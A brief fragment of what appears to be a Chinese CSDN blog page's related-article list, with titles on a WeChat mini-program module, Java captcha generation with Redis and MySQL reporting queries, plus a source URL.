    微擎模块 微信小程序kǎn jià宝7.2.0开源版
    java生成验证码返回前端图片,后端通过redis存储和校验
    MySQL在报表统计中的综合实践:SQL语句与函数应用
    老张的思考
  • 原文地址:https://blog.csdn.net/tanbinn/article/details/139743603